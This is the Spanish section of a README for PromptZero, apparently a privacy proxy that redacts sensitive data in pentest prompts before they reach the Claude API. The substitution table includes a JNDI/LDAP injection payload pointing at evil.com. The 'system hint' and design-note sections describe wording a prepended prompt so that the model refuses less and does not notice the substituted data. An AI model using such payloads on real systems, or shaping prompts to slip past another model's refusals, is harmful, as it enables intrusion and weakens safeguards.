appreciated but not required.\n\n---\n\n---\n\n# Versión en Español\n\n---\n\n## ¿Qué es PromptZero?\n\n**PromptZero aplica los principios de Zero Trust a la interacción con LLMs.** Es un\nproxy local y transparente que detecta y reemplaza datos sensibles — identidades,\ninfraestructura, secretos, material de cliente — en tus prompts **antes** de que\ncrucen el perímetro de tu entorno, y restaura los valores reales en la respuesta.\n\n*Zero trace. Full answer.*\n\n---\n\n## El Problema\n\nUsás IA para analizar logs, escribir reportes de pentesting, revisar código, resumir\ncontratos. Cada prompt que enviás contiene IPs reales, hostnames, nombres, credenciales,\nidentificadores de cliente, payloads — y cada byte cruza un borde que vos no controlás.\n\nLos contratos del vendor y los SaaS de \"Private AI\" no resuelven esto — solo desplazan\nla confianza hacia otro tercero. PromptZero maneja el borde localmente y te deja\nverificarlo end-to-end con las mismas herramientas que ya usás para auditar\ncualquier otra API (Burp, mitmproxy).\n\n---\n\n## Cómo Funciona\n\n```\nTU ENTORNO  (trusted)\n┌─────────────────────────────────────────────────────────────┐\n│                                                             │\n│  Cliente Claude ──▶ PromptZero (localhost:8000)             │\n│  (CLI \u002F SDK \u002F         │                                     │\n│   curl)               ① Detectar spans sensibles            │\n│       ▲               ② Reemplazar con valores sintéticos   │\n│       │               ③ Reenviar prompt limpio              │\n│       └───────────────④ Recibir respuesta del modelo        │\n│                       ⑤ Restaurar valores reales            │\n│                                                             │\n│         ✗ Los datos sensibles NUNCA cruzan este límite      │\n└───────────────────────────────────┬─────────────────────────┘\n                                    │   ← TRUST BOUNDARY\n                                    │   Solo datos sintéticos\n                             ┌──────▼──────┐\n                             │ api.anthropic │   (untrusted —\n                             │     .com      │   verificable\n                             │               │   con Burp \u002F\n                             └───────────────┘   mitmproxy)\n```\n\n---\n\n## Datos que protege\n\n| Categoría | Real → Sintético | Detección |\n|---|---|---|\n| IPv4 | `45.77.12.91` → `198.51.100.1` (RFC 5737) | Regex |\n| IPv6 | `2001:abcd::1` → `2001:db8::1` (RFC 3849) | Regex |\n| Hostname \u002F FQDN | `vpn.empresa.com` → `alpha.example.com` (RFC 2606) | Regex + NLP (URL) |\n| URL | `https:\u002F\u002Fapi.empresa.com\u002Fv2` → `https:\u002F\u002Fbravo.example.com\u002Fv2` | Regex + NLP |\n| host:port | `db.internal:5432` → `charlie.example.com:5432` | Regex |\n| Email | `juan@empresa.com` → `user001@example.com` (RFC 2606) | Regex + NLP |\n| Credencial | `password='S3cur3P@ss!'`, `Authorization: Bearer …`, `\"secret\":\"…\"` → `sk-faux-0001-xxxxxxxxxxxxxxxx` | **Regex (key-aware)** |\n| Teléfono (US\u002FCA) | `+1-555-123-4567` → `+1-555-000-0001` | Regex + NLP |\n| Teléfono (LatAm + ES) | `+54 11 4444-5555`, `+56 9 1234 5678`, `+34 612 345 678`, `+52 55 1234 5678`, `+57 300 123 4567`, `+598 99 123 456` → `+1-555-000-0001` | **Regex (LatAm\u002FES)** |\n| Nombre de persona | `Juan García`, `María Fernández` | **NLP (spaCy en+es)** |\n| Empresa \u002F Organización | `Empresa XYZ S.A.`, `Nexabank Financial S.A.` | **NLP (spaCy en+es)** |\n| DNI Argentina | `DNI 28.456.123` → `DNI 11.111.001` | **Regex (AR)** |\n| CUIT\u002FCUIL Argentina | `20-12345678-9` → `20-11111001-1` | **Regex (AR)** |\n| RUT Chile | `12.345.678-K` → `11.111.001-1` | **Regex (CL)** |\n| DNI\u002FNIE España | `12345678A`, `X1234567A` → `X0000001A` | **Regex (ES) + NLP** |\n| CI Uruguay | `1.234.567-8` → `1.111.001-1` | **Regex (UY)** |\n| Cédula Colombia | `CC 1.234.567` → `CC 1.111.001` | **Regex (CO)** |\n| CURP México | `AAAA000000HAAAAA00` → `FAKE000001HDFXXX11` | **Regex (MX)** |\n| RFC México | `AAAA000000AAA` → `FAKE000001XX1` | **Regex (MX)** |\n| Pasaporte | `AAB123456` → `XX0000001` | **NLP (Presidio)** |\n| SSN (US) | `123-45-6789` → `000-00-0001` | Regex + NLP |\n| Tarjeta de crédito | `4111 1111 1111 1234` → `4111-1111-1111-0001` | Regex + NLP |\n| IBAN | `GB29NWBK60161331926819`, `AR1500011110000…` → `FAKEIBAN000…` | NLP |\n| Token \u002F API key (≥32 chars) | `sk-ant-api03-xxxxxx...` → `FAKE_TOKEN_0001_xxxxxxxx` | Regex |\n| Payload con host | `${jndi:ldap:\u002F\u002Fevil.com}` → `${jndi:ldap:\u002F\u002Fbravo.example.com}` | Regex |\n\n> **Sustituciones pensadas para pentest:** todos los fakes viven dentro\n> de rangos reservados por IANA para documentación (RFC 5737 para IPv4,\n> RFC 3849 para IPv6, RFC 2606 para `example.com`). El modelo los trata\n> como targets opacos no-existentes, **sin** la semántica de \"loopback \u002F\n> lab interno\" que arrastraban las versiones anteriores (`127.0.0.x`,\n> `*.localhost`) — semántica que silenciosamente downgradeaba la\n> severidad de hallazgos de exposición externa. Ver\n> [Notas de diseño](#notas-de-diseño--por-qué-examplecom--system-hint).\n\n---\n\n## Arquitectura\n\n```\npromptzero\u002F\n├── main.py          ← Proxy FastAPI (drop-in para api.anthropic.com)\n├── sanitizer.py     ← Motor de detección: NLP (Presidio+spaCy) + Regex\n├── setup.sh         ← Setup en un comando\n├── requirements.txt\n├── .env.example\n└── examples\u002F\n    ├── poc\u002F                ← PoC: 5 datasets ficticios + demos local\u002FHTML\u002FE2E\n    ├── document_summary\u002F   ← Summary de PDF\u002FDOCX\u002FTXT con protección PII\n    └── pentest_report\u002F     ← Reportes técnicos\u002Fejecutivos desde findings JSON\n```\n\n### Capas de detección\n\n```\nTexto de entrada\n    │\n    ├─▶ [ Capa NLP — Presidio + spaCy (en + es) ]\n    │     PERSON, ORGANIZATION, PHONE, EMAIL,\n    │     CREDIT_CARD, IBAN, SSN, PASSPORT,\n    │     NATIONAL_ID (ES_NIF, NRP), URL, IP_ADDRESS\n    │\n    ├─▶ [ Capa Regex — IDs nacionales por país ]\n    │     AR: DNI, CUIT\u002FCUIL          CL: RUT\n    │     ES: DNI\u002FNIE                 UY: CI\n    │     CO: Cédula (CC)             MX: CURP, RFC\n    │     Teléfonos: +34 +52 +54 +55 +56 +57 +598\n    │\n    ├─▶ [ Capa Regex — red e infraestructura ]\n    │     IPv4, IPv6, hostnames, host:port,\n    │     tokens\u002FAPI keys largos, URLs\n    │\n    └─▶ [ Merge + deduplicación por span ]\n          └─▶ Reemplazar real → sintético\n                └─▶ Guardar en tabla de mapping por sesión\n```\n\n### Tabla de mapping por sesión\n\nCada conversación tiene una **tabla bidireccional real↔ficticio scoped a la sesión**.\nEl mismo valor real siempre mapea al mismo valor sintético dentro de la sesión —\nasí tus conversaciones quedan coherentes de punta a punta.\n\n```\nSesión: \"pentest-acmecorp-2026\"\n──────────────────────────────────────────────────\nValor real                   Valor sintético\n──────────────────────────────────────────────────\n192.168.1.45        ←──────▶  198.51.100.1\ndb.prod.acme.com    ←──────▶  alpha.example.com\nJuan García         ←──────▶  Soren Brännström\nadmin@acme.com      ←──────▶  user001@example.com\nS3cur3P@ss!         ←──────▶  sk-faux-0001-xxxxxxxxxxxxxxxx\n──────────────────────────────────────────────────\n       Guardada en local. Nunca se envía a ningún lado.\n```\n\n---\n\n## Inicio rápido\n\nHay dos formas de correr el proxy. El comportamiento es idéntico — usás\nla que mejor te encaje.\n\n### Opción A — Docker (recomendado)\n\nSin Python, sin virtualenv, sin descarga de modelos. La imagen publicada\nya trae los modelos adentro (linux\u002Famd64 + linux\u002Farm64). Pull y run:\n\n```bash\ndocker run -p 8000:8000 \\\n    -e ANTHROPIC_API_KEY=sk-ant-... \\\n    ghcr.io\u002Fopenbashok\u002Fpromptzero:latest\n# Escuchando en http:\u002F\u002Flocalhost:8000\n```\n\nVariantes comunes:\n\n```bash\n# Pasar un .env entero (ANTHROPIC_API_KEY + UPSTREAM_PROXY + …)\ndocker run -p 8000:8000 --env-file .env ghcr.io\u002Fopenbashok\u002Fpromptzero\n\n# Rutear el hop upstream por Burp corriendo en el host (macOS \u002F Windows)\ndocker run -p 8000:8000 --env-file .env \\\n    -e UPSTREAM_PROXY=http:\u002F\u002Fhost.docker.internal:8080 \\\n    -e UPSTREAM_VERIFY=false \\\n    ghcr.io\u002Fopenbashok\u002Fpromptzero\n```\n\nO buildea local si preferís:\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fopenbashok\u002Fpromptzero && cd promptzero\ndocker build -t promptzero .                       # modelos 'lg', ~1.5 GB\ndocker build --build-arg SPACY_SIZE=sm -t promptzero:slim .   # ~300 MB\n```\n\n### Opción B — Instalación nativa\n\nÚtil si querés hackear el proxy o preferís dejar el venv en tu host.\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fopenbashok\u002Fpromptzero\ncd promptzero\n\n.\u002Fsetup.sh                 # venv + deps + modelos spaCy en+es (~1 GB)\ncp .env.example .env       # poner ANTHROPIC_API_KEY=sk-ant-...\npython main.py             # escuchando en http:\u002F\u002Flocalhost:8000\n```\n\n`.\u002Fsetup.sh` baja los modelos `lg` por default. Variantes: `.\u002Fsetup.sh\nmedium` (~40 MB), `.\u002Fsetup.sh small` (~12 MB), o `.\u002Fsetup.sh en-only`\nsi solo procesás inglés.\n\nDespués, en tu app:\n\n```python\nimport anthropic\n\nclient = anthropic.Anthropic(\n    api_key=\"tu-api-key\",\n    base_url=\"http:\u002F\u002Flocalhost:8000\",   # ← único cambio\n)\n```\n\n---\n\n## Uso\n\n### Python SDK\n\n```python\nimport anthropic\n\nclient = anthropic.Anthropic(base_url=\"http:\u002F\u002Flocalhost:8000\", api_key=\"…\")\nmsg = client.messages.create(\n    model=\"claude-opus-4-6\",\n    max_tokens=1024,\n    messages=[{\"role\": \"user\", \"content\":\n        \"Analizá el log: cliente Juan García (juan@empresa.com) \"\n        \"se conectó desde 192.168.1.45 a db.prod.empresa.com\"\n    }],\n    extra_headers={\"x-session-id\": \"sesion-1\"},  # ← mantiene mappings consistentes\n)\n# → La respuesta de Claude tiene los valores reales restaurados.\n```\n\n### curl\n\n```bash\ncurl -X POST http:\u002F\u002Flocalhost:8000\u002Fv1\u002Fmessages \\\n  -H \"x-api-key: $ANTHROPIC_API_KEY\" \\\n  -H \"anthropic-version: 2023-06-01\" \\\n  -H \"content-type: application\u002Fjson\" \\\n  -d '{\n    \"model\": \"claude-opus-4-6\",\n    \"max_tokens\": 1024,\n    \"messages\": [{\"role\":\"user\",\"content\":\"…tu prompt con datos sensibles…\"}]\n  }'\n```\n\n### Endpoints de administración\n\n```bash\nGET    \u002Fhealth                          # estado + upstream + flag inject_system_hint\nGET    \u002Fstats                           # contadores acumulados desde startup\nGET    \u002Fsessions\u002F{session_id}\u002Fmappings  # tabla real↔ficticio (debug)\nGET    \u002Fsessions\u002F{session_id}\u002Faudit     # request sanitizado + response desanitizado\n                                         # — prueba de no-leak. Requiere DEBUG_AUDIT=1.\nDELETE \u002Fsessions\u002F{session_id}           # resetea la tabla (y el audit log) de la sesión\n```\n\nPara métricas acumuladas en vivo:\n\n```bash\nwatch -n 1 'curl -s localhost:8000\u002Fstats | jq'\n```\n\nTe tira algo así, actualizándose cada segundo:\n\n```json\n{\n  \"uptime_seconds\": 142.3,\n  \"requests\": { \"total\": 7, \"messages\": 5, \"passthrough\": 1, \"errors\": 0 },\n  \"bytes\":    { \"sanitized_in\": 12480, \"desanitized_out\": 28350 },\n  \"pii_spans\": {\n    \"total_unique\": 47,\n    \"by_kind\": { \"person\": 8, \"org\": 5, \"ipv4\": 14, \"hostname\": 9,\n                 \"email\": 6, \"national_id_ar_dni\": 3, \"phone\": 2 }\n  }\n}\n```\n\nAdemás la terminal del proxy imprime **una línea coloreada por request**\nmostrando exactamente lo que se sanitizó, útil para verificar en tiempo\nreal qué datos sensibles se enmascararon en cada turno cuando corrés Claude Code (o\ncualquier cliente) al lado:\n\n```\n[trace] POST \u002Fv1\u002Fmessages     session=poc-pent  +4 spans (total 4: 1 phone, 1 email, 1 ipv4, 1 url)  in= 197B out= 494B  200 2012ms\n[trace] POST \u002Fv1\u002Fmessages     session=poc-pent  +3 spans (total 7: 2 ipv4, 1 person, 1 hostname)  in= 185B out= 697B  200 1273ms\n[trace] GET   \u002Fv1\u002Fmodels           (passthrough, no sanitization)  200  367ms\n```\n\n---\n\n## Usar con Claude Code CLI\n\nEl proxy es drop-in para `api.anthropic.com`. Para que Claude Code vaya por PromptZero:\n\n```bash\n# Terminal 1 — PromptZero corriendo\npython main.py\n\n# Terminal 2 — Claude Code apuntando al proxy\nexport ANTHROPIC_BASE_URL=http:\u002F\u002Flocalhost:8000\nclaude\n# Cada prompt que tipeás se sanitiza antes de llegar a Claude,\n# y las respuestas se desanonimizan antes de llegar a tu terminal.\n```\n\nEl proxy maneja toda la superficie de la API:\n\n| Ruta | Comportamiento |\n|---|---|\n| `POST \u002Fv1\u002Fmessages`              | Sanitizado → forward. Response desanitizado. Streaming OK. |\n| `POST \u002Fv1\u002Fmessages\u002Fcount_tokens` | Sanitizado para que el conteo refleje el prompt real enviado. |\n| Cualquier otra `\u002Fv1\u002F*`           | Forward sin tocar (`models`, `organizations`, `files`, `batches`, …) |\n\n---\n\n## Inspeccionar el tráfico upstream con Burp Suite\n\nNo te quedes con nuestra palabra — ruteá la conexión upstream\n(PromptZero → `api.anthropic.com`) a través de Burp y auditá cada byte\nvos mismo.\n\n```bash\n# En .env:\nUPSTREAM_PROXY=http:\u002F\u002F127.0.0.1:8080\nUPSTREAM_CA_BUNDLE=\u002FUsers\u002Fvos\u002Fburp-ca.pem    # opción recomendada\n# o, para una demo rápida (inseguro):\n# UPSTREAM_VERIFY=false\n```\n\nPasos:\n\n1. Exportá el CA de Burp como PEM: `Burp → Proxy → Settings → Import\u002Fexport CA → PEM`\n2. Habilitá el listener de Burp en `127.0.0.1:8080`\n3. Editá `.env` con las variables de arriba, reiniciá `python main.py`\n4. `curl localhost:8000\u002Fhealth` → tiene que mostrar el `upstream_proxy` activo\n5. Ejecutá tu cliente (Claude Code, `demo_html.py`, lo que sea)\n6. Mirá en Burp **Proxy → HTTP history**: cada request a `api.anthropic.com`\n   muestra el body **sanitizado**. Filtrá por valores reales (`nexabank`,\n   tu IP) → **vacío**. Esa es la prueba.\n\n```\n┌─────────┐  HTTP   ┌────────────┐  HTTPS   ┌──────────┐  HTTPS  ┌─────────────────┐\n│ Claude  │────────▶│ PromptZero │─────────▶│   Burp   │────────▶│ api.anthropic   │\n│  CLI    │  claro  │   :8000    │  TLS     │  :8080   │  TLS    │     .com        │\n└─────────┘         │ sanitiza   │          │  MITM    │         └─────────────────┘\n                    │ desanitiza │          │ inspect  │\n                    └────────────┘          └──────────┘\n```\n\n---\n\n## Ejemplos incluidos\n\n### Proof of Concept\n\n5 datasets ficticios (datos personales, engagement de pentest completo con\nHTTP req\u002Fres + payloads, catálogo de inyecciones, incident response, chat\nde soporte) + tres scripts de demo:\n\n```bash\ncd examples\u002Fpoc\n\n# Demo standalone (sin llamar a Claude) — original \u002F sanitizado \u002F desanitizado\npython demo_local.py\npython demo_local.py data\u002F01_personal_records.json\n\n# Reporte HTML visual — paneles side-by-side coloreados, hover-to-link mappings.\npython demo_html.py --open\npython demo_html.py --with-claude --task triage \\\n    --dataset data\u002F04_incident_response.json --out ir.html --open\n\n# E2E real contra Claude API (proxy tiene que estar corriendo)\npython demo_claude.py\npython demo_claude.py --dataset data\u002F04_incident_response.json --task triage\n\n# Diagnóstico de Burp — 5 pasos con PASS\u002FFAIL claro\npython diagnose_upstream.py\n```\n\n### Document Summary\n\n```bash\ncd examples\u002Fdocument_summary\npython summarize.py contrato.pdf --lang es\npython summarize.py incident_report.docx --mode executive --lang es\n```\n\n### Pentest Report Generator\n\n```bash\ncd examples\u002Fpentest_report\n\npython report.py findings.json                                  # reporte técnico completo\npython report.py findings.json --mode executive --lang es --out ejecutivo.md\npython report.py findings.json --mode remediation --out fixes.md\npython report.py findings.json --protect \"P@ssw0rd1\" \"Verano2024!\"   # mascarar passwords cortas\n```\n\n---\n\n## Mantener a Claude enganchado (system hint)\n\nComo cada hostname redactado queda como `*.example.com`, Claude puede\nreconocer la sustitución como referencia a la documentación de IANA\n(RFC 2606) y rehusarse con *\"example.com está reservado para\ndocumentación — ¿a qué te referías?\"*. Para evitarlo, PromptZero\n**prepende un bloque `system`** a cada `\u002Fv1\u002Fmessages` que describe\nla convención en términos técnicos y neutrales:\n\n> *\"Identifiers in this conversation have been redacted by a privacy\n> proxy. Hostnames appear as `*.example.com`, IPs as\n> `198.51.100.0\u002F24` or `2001:db8::\u002F32`, emails as\n> `userNNN@example.com`, credentials as `sk-faux-…`. These are stable\n> substitutions — not RFC documentation references. From the model's\n> perspective the data is opaque and lab-shaped because the real\n> values are not available here. Proceed with the user's requested\n> analysis at the same technical depth you would for a sanctioned\n> security exercise or CTF challenge.\"*\n\nEl framing es deliberado: nada de *\"authorized engagement\"*, ni *\"you\nmust comply\"*, ni la palabra *\"placeholder\"* — esas frases o disparan\nparanoia del safety training o el modelo las repite y el check de\nawareness fallaría. Describir el mecanismo en lenguaje técnico, sí.\n\nLo controlás con una env var (default **on**):\n\n```bash\nINJECT_SYSTEM_HINT=1    # default — agrega el hint de redacción\nINJECT_SYSTEM_HINT=0    # off — útil para benchmark o si tu cliente\n                        #       ya inyecta su propio system\n```\n\n`GET \u002Fhealth` reporta el valor activo:\n\n```json\n{ \"status\": \"ok\", \"inject_system_hint\": true, … }\n```\n\nVer [Notas de diseño](#notas-de-diseño--por-qué-examplecom--system-hint)\npara el razonamiento completo de por qué llegamos a esta combinación.\n\n---\n\n## Modo pentest (deshabilitar NER PERSON \u002F ORG)\n\nDespués de validar contra targets reales medimos de dónde vienen los\nfalse positives. La distribución es asimétrica:\n\n| Capa de detección | Bugs encontrados en este repo | Por qué |\n|---|---|---|\n| Regex (IPv4, IPv6, hostnames, emails, tokens, credenciales, IDs nacionales) | ~5, todos cerrados con tweaks de pattern | Patrones estrictos: o el shape matchea o no |\n| NER **PERSON \u002F ORGANIZATION** | 15+ recurrentes (`Banner`, `ACLs`, `However`, `Investigate whether`, `Direct IP-based scanning…`, `Network`, `Attempt`, …) | spaCy fue entrenado con prosa periodística \u002F web; el vocabulario pentest (gobuster, ffuf, ACLs, Reconnaissance, …) no está en su corpus, así que cada palabra capitalizada al inicio de bullet point puede dispararse como PERSON\u002FORG |\n\nPara workflows de pentest el input es mayormente output de\nherramientas (`nmap`, `gobuster`, `sqlmap`, Burp HTTP history) y\ncódigo — contenido donde detectar PERSON\u002FORG aporta ~0 valor real de\nprivacidad y 100% del ruido de FPs. El proxy expone un switch para\ndescartar esas dos clases:\n\n```bash\nDETECT_PERSON_ORG=1    # default — pipeline NER completo\nDETECT_PERSON_ORG=0    # modo pentest — drop PERSON \u002F ORG, todo lo demás sigue\n```\n\nQué sigue funcionando con el flag en off: IPv4, IPv6, hostnames,\nURLs, host:port, emails, IDs nacionales (AR\u002FCL\u002FES\u002FUY\u002FCO\u002FMX),\ntarjetas de crédito, IBAN, SSN, teléfonos, API tokens, credenciales\nkey-aware. Qué deja de detectarse: nombres de personas \u002F\norganizaciones en narrativa libre.\n\n`GET \u002Fhealth` reporta el valor activo:\n\n```json\n{ \"status\": \"ok\", \"detect_person_org\": false, … }\n```\n\nCuándo usar cada modo:\n\n- **`DETECT_PERSON_ORG=1`** (default) — incident reports, document\n  summaries, chats de soporte, cualquier cosa escrita por humanos\n  donde querés redactar nombres de auditor \u002F contacto \u002F cliente.\n- **`DETECT_PERSON_ORG=0`** — Claude Code apuntando al proxy para\n  engagements de pentest activo, triage de logs, code review sobre\n  shell output, herramientas automatizadas que producen texto\n  técnico estructurado.\n\n---\n\n## Suite de tests de integración\n\n`examples\u002Fpoc\u002Fintegration_test.py` ejecuta llamadas reales a Claude\ncontra el proxy y chequea cuatro invariantes por escenario — útil\ncomo regression runner después de cualquier cambio al sanitizer, y\ncomo sanity check antes de meterte en un engagement real:\n\n| Check | Qué verifica |\n|---|---|\n| **L** leak       | Ningún valor real esperado aparece en el payload upstream que recibió Anthropic |\n| **N** ner-recall | Todos los valores reales esperados están en la tabla de mapping de la sesión |\n| **R** round-trip | Ningún fake quedó en el reply desanonimizado (toda sustitución fue revertida) |\n| **A** awareness  | El modelo no marca la data como test \u002F placeholder \u002F fictional |\n\nTrae 6 escenarios listos (pentest report single-turn, log triage,\ntransformation resistance, JSON payload, code review, más un escenario\nmulti-turn de 3 turnos para re-sanitización del historial):\n\n```bash\n# Arrancar el proxy con DEBUG_AUDIT=1 para que el runner pueda leer \u002Faudit\nDEBUG_AUDIT=1 python main.py\n\n# En otra terminal\npython examples\u002Fpoc\u002Fintegration_test.py \\\n    --proxy http:\u002F\u002F127.0.0.1:8000 \\\n    --model claude-haiku-4-5\n```\n\nEl output es PASS\u002FFAIL por escenario más un punch-list de checks\nfallados — la suite cazó cuatro bugs reales mientras la construíamos\n(truncado de URLs por Presidio, leak de passwords cortas, colisión\ndel pool de fakes IPv6, falsos positivos de hostname sobre\nidentificadores de Python) antes de que ninguno llegara a producción.\n\n---\n\n## Notas de diseño — Por qué `example.com` + system hint?\n\nRazonamiento detrás de las decisiones de sustitución, por si querés\nforkear o ajustar el proxy para otra familia de LLM u otro modelo de\nriesgo. Iteramos tres estrategias distintas de fake-domain, cada una\ncon un trade-off diferente.\n\n**1. Fakes con sabor a loopback (versiones tempranas: `127.0.0.x` \u002F\n`*.localhost` \u002F `userNNN@fakecorp.local`).** El round-trip funcionaba\npero cambiaba silenciosamente el razonamiento de Claude: hallazgos\nde exposición externa quedaban enmarcados como \"servicio interno \u002F\nloopback, criticidad menor\". Para un reporte de pentest esto\nsignifica que el modelo **downgradea la severidad** sin avisarte.\nDescartado.\n\n**2. Dominios reales-plausibles (ej. `acme-corp.io`, `nexabank.com`).**\nDos fallas:\n- El modelo reconoce la marca de su corpus de entrenamiento y aplica\n  conocimiento del mundo real (\"Nexabank usa Spring Boot, así que…\")\n  contaminando el análisis con hechos alucinados sobre una empresa\n  real.\n- Nombres como *Acme Corp*, *Globex*, *Initech*, *Umbrella Tech* son\n  EXACTAMENTE los placeholders que Claude usa cuando **inventa**\n  ejemplos ficticios en su propia narrativa. El modelo los escribe\n  sin que se los hayamos enviado; el desanitizer entonces los mapea\n  a lo que sea que viva en la tabla de sesión (a menudo un falso\n  positivo de NLP como `Credential → Bob Calloway`) y corrompe el\n  output visible al usuario.\n\n**3. Rangos reservados de IANA para documentación (actual).** RFC\n5737 (`198.51.100.0\u002F24`, `203.0.113.0\u002F24`), RFC 3849\n(`2001:db8::\u002F32`), RFC 2606 (`example.com`). Claude los tiene en su\ncorpus de entrenamiento **como placeholders**, así que no pulleea\nhechos del mundo real sobre ellos y no aplica semántica de loopback\nni de interno-solamente. Los pools de nombres (`Soren Brännström`,\n`Nordhaven Holdings`, …) son invenciones europeas deliberadamente\npoco comunes que Claude **no** emite espontáneamente al escribir\nejemplos.\n\nEl trade-off: con `*.example.com` el modelo a veces reconoce la\nsustitución y pregunta *\"example.com está reservado para\ndocumentación — ¿a qué te referías?\"*. Ahí entra el\n**[system hint](#mantener-a-claude-enganchado-system-hint)**: un\nbloque corto, neutral, técnico, prependido a cada request, que\nexplica el mecanismo de redacción y le indica al modelo que opere\ncon la misma profundidad que un ejercicio de seguridad sancionado.\nDefusea el reconocimiento sin sonar a jailbreak — probamos framings\ncon *\"authorized engagement\"*, *\"you must comply\"*, *\"real\npentest\"*, y todos aumentaron la tasa de refusal porque pegan\ndirecto contra el safety pattern. Describir el mecanismo, no.\n\nSi tu use case **no** es pentesting — por ejemplo, generar contenido\nde training donde el framing de lab ayuda — desactivá el hint con\n`INJECT_SYSTEM_HINT=0`. La sustitución sigue siendo idéntica.\n\n---\n\n## Sobre OpenBash\n\n**PromptZero** es un proyecto de [OpenBash.com](https:\u002F\u002Fopenbash.com) —\nuna comunidad construida **de pentesters para pentesters**.\n\nConstruimos herramientas de seguridad open source para que la comunidad pueda\ntrabajar mejor, mantenerse protegida y conservar sus datos sensibles donde corresponde: en casa.\n\nSi esta herramienta te sirve, compartila. Si encontrás un bug, abrí un issue.\nSi la mejorás, mandá un PR.\n\n---\n\n*Made with ♥ by the OpenBash community*\n","PromptZero 是一个基于零信任架构的本地透明代理，用于处理与大型语言模型（LLM）的交互。它能够在数据离开你的环境之前检测并替换提示中的敏感信息（如IP地址、主机名、凭证等），并在返回响应时恢复真实值，从而确保个人身份信息（PII）和敏感数据的安全。该项目使用Python编写，适用于需要在与外部AI服务（例如Claude API）交互时保护内部数据隐私的场景，特别适合信息安全测试人员及红队成员使用。通过将信任边界控制在本地，PromptZero 为用户提供了一种可验证的安全解决方案。",2,"2026-06-11 04:02:20","CREATED_QUERY"]